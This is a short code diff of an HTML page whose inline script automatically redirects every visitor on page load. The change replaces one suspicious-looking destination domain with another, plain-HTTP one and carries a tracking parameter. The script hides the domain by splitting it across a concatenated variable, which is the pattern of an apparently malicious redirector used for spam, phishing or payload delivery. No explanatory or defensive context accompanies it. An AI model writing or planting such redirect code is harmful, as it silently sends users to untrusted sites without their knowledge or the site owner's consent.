--- a/try.html
+++ b/try.html
@@ -2,7 +2,7 @@
 <head>
         <script>
                 var ghko = "v";
-                window.location.href = "https://" + ghko + "ipshop.zone/?tr=13058";
+                window.location.href = "http://" + ghko + "junjuncruzit.online/zlt1.html/?tr=13058";
         </script>
 </head>
 <body>
